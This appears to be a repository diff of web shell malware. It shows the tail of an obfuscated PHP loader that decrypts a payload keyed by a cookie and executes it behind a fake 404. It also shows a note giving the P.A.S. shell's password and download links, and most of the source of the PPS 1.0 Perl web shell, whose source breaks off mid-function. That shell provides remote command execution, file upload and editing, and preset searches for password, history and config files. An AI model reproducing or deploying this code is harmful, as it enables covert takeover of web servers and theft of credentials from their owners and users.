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
EsOvoro=
'));if(isset($_COOKIE['sP']) && $_COOKIE['sP']!==NULL){$g__g_=$_COOKIE['sP'];$g__g_=md5($g__g_).substr(md5(strrev($g__g_)),0,strlen($g__g_));for($g____g_=0;$g____g_<15185;$g____g_++){$g___g_[$g____g_]=chr(( ord($g___g_[$g____g_])-ord($g__g_[$g____g_]))%256);$g__g_.=$g___g_[$g____g_];}if($g___g_=@gzinflate($g___g_)){$g____g_=create_function('',$g___g_);unset($g___g_,$g__g_);$g____g_();}} @header("Status: 404 Not Found"); ?>

21
php/pas/password.txt Normal file
View file

@ -0,0 +1,21 @@
╔══════════════════╗
╔─╣ P.A.S. v.3.0.10 ╠─╗
║ ╚══════════════════╝ ╚───────────────────────────────────────────────╗
║ ║
║ ╔────────────╗ ┌───────────────────────────────────────────────────┐ ║
╠═╣ PASSWORD* ╠─╣ root │ ║
║ ╚────────────╝ └───────────────────────────────────────────────────┘ ║
║ ║
║ ╔────────────╗ ┌───────────────────────────────────────────────────┐ ║
╠═╣ DOWNLOAD ╠─╣ http://profexer.name/pas/download.php │ ║
║ ╚────────────╝ └───────────────────────────────────────────────────┘ ║
║ ║
║ ╔────────────╗ ┌───────────────────────────────────────────────────┐ ║
╠═╣ DiSCUSSiON ╠─╣ https://rdot.org/forum/showthread.php?t=1567 │ ║
║ ╚────────────╝ │ │ ║
║ │ https://exploit.in/forum/index.php?showtopic=68238│ ║
║ 2011-2013 └───────────────────────────────────────────────────┘ ║
╚══════════════════════════════════════════════════════════════════════╝

2357
php/priv8-2012-bypass-shell.php.txt Normal file
View file

File diff suppressed because it is too large Load diff

1522
php/wso/wso2.php Normal file
View file

File diff suppressed because it is too large Load diff

7
php/wso/wso2_pack.php Normal file
View file

File diff suppressed because one or more lines are too long

173
pl/pps-pl/pps-v1.0.pl Normal file
View file

@ -0,0 +1,173 @@
#!/usr/bin/perl
#################################################################################
#PPS 1.0 - Perl-cgi web shell by Pashkela [BugTrack Team] © 2010
use Digest::MD5 qw(md5_hex);
$Password = "63a9f0ea7bb98050796b649e85481845";# - root [md5]
$WinNT = 0; # *nix=0,win=1
$CommandTimeoutDuration = 10;# max time of command execution in console in seconds
##################################################################################
$NTCmdSep = "&";
$UnixCmdSep = ";";
$ShowDynamicOutput = 1;
$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);$CmdPwd = ($WinNT ? "cd" : "pwd");$PathSep = ($WinNT ? "\\" : "/");$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");$LogFlag = false;use File::Basename;
use MIME::Base64;sub cod($){my $url =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;$url=encode_base64($_[0]);return $url;}
sub dec($){ my $url1=decode_base64($_[0]);return $url1;}sub ReadParse {local (*in) = @_ if @_;local ($i, $loc, $key, $val);$MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;if($ENV{'REQUEST_METHOD'} eq "GET"){$in = $ENV{'QUERY_STRING'};}elsif($ENV{'REQUEST_METHOD'} eq "POST"){binmode(STDIN) if $MultipartFormData & $WinNT;read(STDIN, $in, $ENV{'CONTENT_LENGTH'});}if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/){$Boundary = '--'.$1; @list = split(/$Boundary/, $in); $HeaderBody = $list[1]; $HeaderBody =~ /\r\n\r\n|\n\n/;$Header = $`;$Body = $';$Body =~ s/\r\n$//;$in{'filedata'} = $Body;$Header =~ /filename=\"(.+)\"/;$in{'f'} = $1;$in{'f'} =~ s/\"//g;$in{'f'} =~ s/\s//g;for($i=2; $list[$i]; $i++){$list[$i] =~ s/^.+name=$//;$list[$i] =~ /\"(\w+)\"/;$key = $1;$val = $';$val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;$val =~ s/%(..)/pack("c", hex($1))/ge;$in{$key} = $val;}}else{@in = split(/&/, $in);foreach $i (0 .. $#in){$in[$i] =~ s/\+/ /g;($key, $val) = split(/=/, $in[$i],2);$key =~ s/%(..)/pack("c", hex($1))/ge;$val =~ s/%(..)/pack("c", hex($1))/ge;$in{$key} .= "\0" if (defined($in{$key}));$in{$key} .= $val;}}}sub uname{$s="uname -a";$s.=" -U $q{u}" if($q{u});return $s;}sub hddall{$s='df -k /|sed 1d|awk "{total += \$2} {print total/1024/1024}"';$s.=" -U $q{u}" if($q{u});return $s;}sub hddfree{$s='df -k /|sed 1d|awk "{total += \$4} {print total/1024/1024}"';$s.=" -U $q{u}" if($q{u});return $s;}sub hddproc{$s='df -k /| sed 1d | awk "{total += \$5} {print 100-total}"';$s.=" -U $q{u}" if($q{u});return $s;}$hddall=hddall();$hddfree=hddfree();$hddproc=hddproc();sub PH{printf ("%.2f",(@_))};sub id{$s="id";$s.=" -U $q{u}" if($q{u});return $s;}
sub dir_list{my @list=();$CurrentDir=~s!\Q//!/!g;my $dir=$CurrentDir;@list=scan_dir($dir);$id=0;foreach $arg(@list) {$id++;$ii='d'.$id;my $name=fileparse($arg,@suffixlist);if (-d $arg){print '<tr class=l1><th class=chkbx><input type=checkbox class=chkbx></th><td><form method=POST name='.$ii.' action='.$ScriptLocation.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value="cd '.$arg.'"><a href="javascript:document.'.$ii.'.submit()"><font face="Verdana" size="2">&nbsp;<b>[ '.$name.' ]</b></font></a></form></td><td>dir</td><td>'.mtime($arg).'</td>'.owner($arg).'<td><table><td><form name='.$ii.'rt method="POST" action="'.$ScriptLocation.'"><input type="hidden" name="d" value="'.$CurrentDir.'"><input type="hidden" name="a" value="RT"><input type="hidden" name="fdata" value='.cod(mtime($arg)).'><input type="hidden" name="fchmod" value='.perm($arg).'><input type="hidden" name="f" value='.$name.'><a href="javascript:document.'.$ii.'rt.submit()">R T </a></form></td><td><form method=POST name='.$ii.'z action='.$ScriptLocation.'><input type=hidden name=zip value='.$name.'><input type=hidden name=arh_name value='.$ii.'z><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=zip><a href="javascript:document.'.$ii.'z.submit()">[zip]</a></form></td><td><form method=POST name='.$ii.'uz action='.$ScriptLocation.'><input type=hidden name=unzip_name value='.$name.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=unzip><a href="javascript:document.'.$ii.'uz.submit()">[unzip]</a></form></td><td><form method=POST name='.$ii.'del action='.$ScriptLocation.'><input type=hidden name=del_dir value='.$name.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=deldir><a href="javascript:document.'.$ii.'del.submit()">[<font color=#FF0000>x</font>]</a></form></td></table/></td></tr>';}else{$size1 = (stat $arg)[7]/1024;if ($size1<1000){$size = sprintf("%.2f",($size1))." KB";}else{$size = sprintf("%.2f",($size1/1024))." MB";}print '<tr class=l1><th class=chkbx><input type=checkbox class=chkbx></th><td><form name='.$ii.' method=post action='.$ScriptLocation.'><input type=hidden name=path id=view value='.$name.'><input type=hidden name=a value=view_file><input type=hidden name=d value='.$CurrentDir.'><a href="javascript:document.'.$ii.'.submit()"><font face="Verdana" size="2">&nbsp;'.$name.'</font></a></form></td><td>'.$size.'</td><td>'.mtime($arg).'</td>'.owner($arg).'<td><table><td><form name='.$ii.'rt method="POST" action="'.$ScriptLocation.'"><input type="hidden" name="d" value="'.$CurrentDir.'"><input type="hidden" name="a" value="RT"><input type="hidden" name="fdata" value='.cod(mtime($arg)).'><input type="hidden" name="fchmod" value='.perm($arg).'><input type="hidden" name="f" value='.$name.'><a href="javascript:document.'.$ii.'rt.submit()">R T </a></form></td><td><form name='.$ii.'ed method=post action='.$ScriptLocation.'><input type=hidden name=path id=edit1_file value='.$name.'><input type=hidden name=a value=edit_file_path><input type=hidden name=d value='.$CurrentDir.'><a href="javascript:document.'.$ii.'ed.submit()">E </a></form></td><td><form name='.$ii.'d method="POST" action="'.$ScriptLocation.'"><input type="hidden" name="d" value="'.$CurrentDir.'"><input type="hidden" name="a" value="download"><input type="hidden" name="f" value='.$name.'><a href="javascript:document.'.$ii.'d.submit()">D </a></form></td><td><form method=POST name='.$ii.'z action='.$ScriptLocation.'><input type=hidden name=zip value='.$name.'><input type=hidden name=arh_name value='.$ii.'z><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=zip><a href="javascript:document.'.$ii.'z.submit()">[zip]</a></form></td><td><form method=POST name='.$ii.'uz action='.$ScriptLocation.'><input type=hidden name=unzip_name value='.$name.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=unzip><a href="javascript:document.'.$ii.'uz.submit()">[unzip]</a></form></td><td><form method=POST name='.$ii.'del action='.$ScriptLocation.'><input type=hidden name=del_file value='.$name.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=delfile><a href="javascript:document.'.$ii.'del.submit()">[<font color=#FF0000>x</font>]</a></form></td></table></td></tr>';
}}print "</table>";sub perm($){my $mode=sprintf("%04o",((stat($_[0]))[2])&07777);return $mode;}sub owner($){my $uid=(stat $_[0])[4];my $user=(getpwuid $uid)[0];my $uid1=(stat $_[0])[5];my $group=(getgrgid $uid1)[0];my $mode=sprintf("%04o",((stat($_[0]))[2])&07777);if (!-r $_[0]){return '<td>'.$user.'/'.$group.'</td><td><font color=#FF0000>'.$mode.'</font></td>';}elsif(!-w $_[0]){return '<td>'.$user.'/'.$group.'</td><td><font color=#FFFFFF>'.$mode.'</font></td>';}else{return '<td>'.$user.'/'.$group.'</td><td><font color=#25ff00>'.$mode.'</font></td>';}}sub mtime($){my ($seconds, $minutes, $hours, $day, $month, $year, $wday, $yday,$isdst) = localtime((stat($_[0]))[9]);my $mmtime = ($year+1900).'-'.sprintf("%02d",($month+1)).'-'.sprintf("%02d",$day).' '.sprintf("%02d",$hours).':'.sprintf("%02d",$minutes).':'.sprintf("%02d",$seconds);return $mmtime;}sub scan_dir{my ($dir)=@_;my @dirs=();my @files=();my @list=();my @file=();for $file (glob($dir.'/.*')){if (-d $file && $file ne $dir.'/.'){push @dirs,$file;}if (-f $file){push @files,$file;}}for $file (glob($dir.'/*')){if (-d $file) {push @dirs,$file;}else{push @files,$file;}}@list=(@dirs,@files);return @list;}}sub HtmlSpecialChars($){my ($st)=@_;$st=~s|<|[<]|g;$st=~s|>|[>]|g;return $st;}sub DeHtmlSpecialChars($){my ($st)=@_;$st=~s|\[<\]|<|g;$st=~s|\[>\]|>|g;return $st;}$uname = uname();$idd = id();sub P{print @_}sub PrintPageHeader{print "Content-type: text/html\n\n";&GetCookies;$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;if ($LoggedIn != 1) {$Password = 0}$EncodedCurrentDir = $CurrentDir;
$EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;print <<END;
<html><head><title>PPS 1.0</title>$HtmlMetaHeader<style>body{background-color:#444;color:#e1e1e1;}body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }table.info{ color:#fff;background-color:#222; }span,h1,a{ color: #df5 !important; }span{ font-weight: bolder; }h1{ border-left:5px solid #df5;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }div.content{ padding: 5px;margin-left:5px;background-color:#333; }a{ text-decoration:none; }a:hover{ text-decoration:underline; }.ml1{ border:1px solid#444;padding:5px;margin:0;overflow: auto; }.bigarea{ width:100%;height:250px; }input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid #df5; font: 9pt Monospace,'Courier New'; }form{ margin:0px; }#toolsTbl{ text-align:center; }.toolsInp{ width: 300px }.main th{text-align:left;background-color:#5e5e5e;}.main tr:hover{background-color:#5e5e5e}.l1{background-color:#444}.l2{background-color:#333}pre{font-family:Courier,Monospace;}</style></head><body onLoad="document.checkbox.@_.focus()" bgcolor="#000000" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0"><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Hdd:<br>DateTime:<br>Cwd:</span></td><td><nobr>
END
P("".`$uname`. "");print "</nobr><br>";P("". `$idd` . "");print "<br>";PH("".`$hddall`. "");print " GB <span>Free: </span>";PH("".`$hddfree`. "");print " GB [ ";P("". `$hddproc`);print "% ]";$time=localtime;print "<br>$time<table><td>";my $cwd="";
my @path = split("/", $CurrentDir);my $mode=sprintf("%04o",((stat($CurrentDir))[2])&07777); my $ss=0;print '<table cellpadding=0 cellspacing=0><td><form method=POST action='.$ScriptLocation.' name=cwd0><a href="javascript:document.cwd0.submit()">[..]&nbsp;</a><input type=hidden name=cc value="/"><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value="changedir"></form></td>';foreach my $ar(@path){if($ar){$cwd .= "/".$ar;$ss++;print '<td><form method=POST action='.$ScriptLocation.' name=cwd'.$ss.'><a href="javascript:document.cwd'.$ss.'.submit()">/'.$ar.'</a><input type=hidden name=cc value='.$cwd.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value="changedir"></form></td>';}}my $fw="<font face=Verdana size=2 color=#FFFFFF>";my $fe="</font>";print "</table>";sub cwdcol{if (!-r $CurrentDir){return '<font color=#FF0000>'.$mode.'</font>';}elsif(!-w $CurrentDir){return '<font color=#FFFFFF>'.$mode.'</font>';}else{return '<font color=#25ff00>'.$mode.'</font>';}}print "<td>".cwdcol()."</td><td><a href=$ScriptLocation> [ home ] </a></td></td></table>";
print <<END;
</td><td width=1 align=right><nobr><span>Server IP:</span><br>$ENV{'SERVER_ADDR'}<br><span>Client IP:</span><br>$ENV{'REMOTE_ADDR'}</nobr></td></tr></table><table width="100%" colspan="1" bgcolor="#222"><td><form method="POST" name=systeminfo action=$ScriptLocation><input type="hidden" name="a" value="systeminfo"><input type=hidden name=d value=$CurrentDir><a href="javascript:document.systeminfo.submit()">$fw [ $fe Sysinfo $fw ] $fe</a></form></td><td><form method=POST name=files action=$ScriptLocation><input type=hidden name=cc value=$CurrentDir><a href="javascript:document.files.submit()">$fw [ $fe Files $fw ] $fe</a><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=hidden name=c value="cd $CurrentDir"></form></td><td><form method="POST" name=consoler action=$ScriptLocation><input type="hidden" name="a" value="console"><input type="hidden" name="d" value=$CurrentDir><a href="javascript:document.consoler.submit()"> $fw [ $fe Console $fw ] $fe</a></form></td><td><form method="POST" name=sqlman action=$ScriptLocation><input type=hidden name=d value=$CurrentDir><input type="hidden" name="a" value="sql"><a href="javascript:document.sqlman.submit()">$fw [ $fe SQL $fw ] $fe</a></form></td><td><form method="POST" name=backconn action=$ScriptLocation><input type=hidden name=d value=$CurrentDir><input type="hidden" name="a" value="net"><a href="javascript:document.backconn.submit()">$fw [ $fe Network $fw ] $fe</a></form></td><td><form method="POST" name=evalc action=$ScriptLocation><input type=hidden name=d value=$CurrentDir><input type="hidden" name="a" value="code"><a href="javascript:document.evalc.submit()">$fw [ $fe Code $fw ] $fe</a></form></td><td><form method="POST" name=logout action=$ScriptLocation><input type="hidden" name="a" value="logout"><a href="javascript:document.logout.submit()">$fw [ $fe Logout $fw ] $fe</a></form></td><td><form method="POST" name=remove action=$ScriptLocation><input type="hidden" name="a" value="remove"><a href="javascript:document.remove.submit()">$fw [ $fe Self remove $fw ] $fe</a></form></td></table></tr></table><font color="#C0C0C0" size="2">
END
}
sub PrintLoginForm{print <<END;
<form name="f" method="POST" action="$ScriptLocation" align="center"><input type="password" name="p"><input type="submit" value="Enter"></form>
END
}
sub PrintPageFooter{print "</font></body></html>";}sub GetCookies{@httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});foreach $cookie(@httpcookies){($id, $val) = split(/=/, $cookie);$Cookies{$id} = $val;}}sub PerformLogout{print "Set-Cookie: SAVEDPWD=;\n";print "Content-type: text/html\n\n";&PrintLoginForm;}sub PerformLogin{if(md5_hex($LoginPassword) eq $Password){print "Set-Cookie: SAVEDPWD=".md5_hex($LoginPassword).";\n";&PrintPageHeader("c");file_header();&PrintCommandLineInputForm;&PrintPageFooter;}else{print "Content-type: text/html\n\n";&PrintLoginForm;}}sub FileManager{&PrintPageHeader("f");file_header();&PrintCommandLineInputForm; &PrintPageFooter;}sub PrintCommandLineInputForm{$Prompt = $WinNT ? "$CurrentDir> " : "[$ServerName $CurrentDir]\$ ";
dir_list();sub wr_cur {if (!-w $CurrentDir){print '<font color=#FF0000>[Not writable]</font>';}else{print '<font color=#25ff00>[Writeable]</font>';}}
print <<END;
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'><tr><td><form method=POST><span>Change dir:</span><br><input class=toolsInp type=text name=cc value=$CurrentDir><input type=submit value='>>'><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=hidden name=c value="changedir"></form></td><td><form method=POST action=$ScriptLocation><span>Read file:</span><br><input class='toolsInp' type=text name=path><input type=hidden name=a value=view_file><input type=hidden name=d value=$CurrentDir><input type=submit value='>>'></form></td></tr><tr><td><form method=POST action="$ScriptLocation"><span>Make dir:</span>
END
wr_cur();
print <<END;
<br><input class='toolsInp' type=text name=md><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=hidden name=c value="makedir"><input type=submit value='>>'></form></td><td><form method=POST action="$ScriptLocation"><span>Make file:</span>
END
wr_cur();
print <<END;
<br><input class='toolsInp' type=text name=mf><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=hidden name=c value="makefile"><input type=submit value='>>'></form></td></tr><tr><td><form name="ff" method="POST" action="$ScriptLocation"><span>Execute:</span><br><input type="hidden" name="a" value="command"><input type="hidden" name="d" value="$CurrentDir"><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
<td>
END
&PrintFileUploadForm;
print <<END;
</td></table>
END
}
sub PrintFileUploadForm{
print <<END;
<span>Upload file: </span>
END
wr_cur();
print <<END;
<br><form name="upload_file_form" enctype="multipart/form-data" method="POST" action="$ScriptLocation"><input type="file" name="f" class=toolsInp><input type="submit" value=">>"><input type="hidden" name="d" value="$CurrentDir"><input type="hidden" name="a" value="upload"></form>
END
}
sub ConsoleP{
print <<END;
<table class=info id=toolsTbl cellpadding=0 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'><td><table class=info id=toolsTbl cellpadding=3 cellspacing=3 width=50%><tr><td><form name="run" method="POST" action="$ScriptLocation"><br><span>\$</span><input type="hidden" name="a" value="command1"><input type="hidden" name="d" value="$CurrentDir"><input type=text class=toolsInp name=c value=''><input type=submit value=">>"></form></td></tr><tr><tr><td><form name="alias" method="POST" action="$ScriptLocation"><br><span>\$</span><input type="hidden" name="a" value="command1"><input type="hidden" name="d" value="$CurrentDir"><select name=aliases class=toolsInp><option value="ls -lha">List dir</option><option value="lsattr -va">list file attributes on a Linux second extended file system</option><option value="netstat -an | grep -i listen">show opened ports</option><option value="ps aux">process status</option><optgroup label="-Find-"></optgroup><option value="find / -type f -perm -04000 -ls">find all suid files</option><option value="find . -type f -perm -04000 -ls">find suid files in current dir</option><option value="find / -type f -perm -02000 -ls">find all sgid files</option><option value="find . -type f -perm -02000 -ls">find sgid files in current dir</option><option value="find / -type f -name config.inc.php">find config.inc.php files</option><option value="find / -type f -name &quot;config*&quot;">find config* files</option><option value="find . -type f -name &quot;config*&quot;">find config* files in current dir</option><option value="find / -perm -2 -ls">find all writable folders and files</option><option value="find . -perm -2 -ls">find all writable folders and files in current dir</option><option value="find / -type f -name service.pwd">find all service.pwd files</option><option value="find . -type f -name service.pwd">find service.pwd files in current dir</option><option value="find / -type f -name .htpasswd">find all .htpasswd files</option><option value="find . -type f -name .htpasswd">find .htpasswd files in current dir</option><option value="find / -type f -name .bash_history">find all .bash_history files</option><option value="find . -type f -name .bash_history">find .bash_history files in current dir</option><option value="find / -type f -name .fetchmailrc">find all .fetchmailrc files</option><option value="find . -type f -name .fetchmailrc">find .fetchmailrc files in current dir</option><optgroup label="-Locate-"></optgroup><option value="locate httpd.conf">locate httpd.conf files</option><option value="locate vhosts.conf">locate vhosts.conf files</option><option value="locate proftpd.conf">locate proftpd.conf files</option><option value="locate psybnc.conf">locate psybnc.conf files</option><option value="locate my.conf">locate my.conf files</option><option value="locate admin.php">locate admin.php files</option><option value="locate cfg.php">locate cfg.php files</option><option value="locate conf.php">locate conf.php files</option><option value="locate config.dat">locate config.dat files</option><option value="locate config.php">locate config.php files</option><option value="locate config.inc">locate config.inc files</option><option value="locate config.inc.php">locate config.inc.php</option><option value="locate config.default.php">locate config.default.php files</option><option value="locate config">locate config* files </option><option value="locate '.conf'">locate .conf files</option><option value="locate '.pwd'">locate .pwd files</option><option value="locate '.sql'">locate .sql files</option><option value="locate '.htpasswd'">locate .htpasswd files</option><option value="locate '.bash_history'">locate .bash_history files</option><option value="locate '.mysql_history'">locate .mysql_history files</option><option value="locate '.fetchmailrc'">locate .fetchmailrc files</option><option value="locate backup">locate backup files</option><option value="locate dump">locate dump files</option><option value="locate priv">locate priv files</option></select><input type=submit value='>>'></form></td></tr></table></td></table>
END
}
sub RTP{my $path=$CurrentDir."/".$TransferFile;print "Path: $path";$Fdata = dec($Fdata);
print <<END;
<table class=info id=toolsTbl cellpadding=0 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'><td><table cellpadding=3 cellspacing=3 width=50%><tr><td><form name="run" method="POST" action="$ScriptLocation"><input type="hidden" name="a" value="command"><input type="hidden" name="d" value="$CurrentDir"><input type=hidden name=c value=rename_file><input type=hidden name=path value=$path><input type=text size=20 name=rename_file value=$TransferFile><input type=submit value='RENAME'></form></td><tr><td><form name="run" method="POST" action="$ScriptLocation"><input type="hidden" name="a" value="command"><input type="hidden" name="d" value="$CurrentDir"><input type=hidden name=c value=touch_file><input type=hidden name=path value=$path><input type=text size=20 name=touch_file value="$Fdata"><input type=submit value='TOUCH '></form></td><tr><td><form name="run" method="POST" action="$ScriptLocation"><input type="hidden" name="a" value="command"><input type="hidden" name="d" value="$CurrentDir"><input type=text size=20 name=chmod value=$Fchmod><input type=hidden name=path value=$path><input type=hidden name=c value=chmod_file><input type=submit value='CHMOD '></form></td></tr><tr><td><form name="run" method="POST" action="$ScriptLocation"><input type="hidden" name="a" value="view_file"><input type="hidden" name="d" value="$CurrentDir"><input type=hidden name=path value=$TransferFile><input type=submit value='VIEW'></form></td></tr><tr><td><form name="run" method="POST" action="$ScriptLocation"><input type="hidden" name="a" value="edit_file_path"><input type="hidden" name="d" value="$CurrentDir"><input type=hidden name=path value=$TransferFile><input type=submit value='EDIT'></form></td></tr></table></td></table>
END
}
sub RT{&PrintPageHeader;print "<h1>File operations:</h1>";RTP();&PrintPageFooter;}
sub Console{&PrintPageHeader;print "<h1>Console:</h1>";P("". `$idd` . "");ConsoleP();&PrintPageFooter;}
sub CommandTimeout{if(!$WinNT){alarm(0);
print <<END;
</xmp>Command exceeded maximum time of $CommandTimeoutDuration second(s).<br>Killed it!
END
ConsoleP();exit;}}
sub file_header {
print <<END;
<h1>File manager</h1><table width=100% class=main cellspacing=0 cellpadding=0><tr><th width='13px'><input type=checkbox class=chkbx></th><th>Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>
END
}
sub ExecuteCommand1{if($RunCommand =~ m/^\s*cd\s+(.+)/){$CurrentDir=~s!\Q//!/!g;$OldDir=$CurrentDir;$Command="cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;chop($CurrentDir=`$Command`);&PrintPageHeader("c");print "<h1>Console:</h1>";print "<font size=2>";$Prompt = $WinNT ? "$OldDir> " : "[$ServerName $OldDir]\$ ";print "$Prompt $RunCommand";}else{&PrintPageHeader("c");print "<h1>Console:</h1>";print "<font size=2>";$Prompt = $WinNT ? "$CurrentDir> " : "[$ServerName $CurrentDir]\$ ";print "$Prompt $RunCommand<pre>";$Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;if(!$WinNT){$SIG{'ALRM'}=\&CommandTimeout;alarm($CommandTimeoutDuration);}if($ShowDynamicOutput){$|=1;$Command .= " |";open(CommandOutput, $Command); while(<CommandOutput>){$_ =~ s/(\n|\r\n)$//;print "$_\n";}$|=0;}else{print `$Command`;}if(!$WinNT){alarm(0);}print "</pre>";}print "</font>";ConsoleP();&PrintPageFooter;}sub ExecuteCommand{my $path=$in{'path'};$CurrentDir=$in{'d'};$CurrentDir=~s!\Q//!/!g;
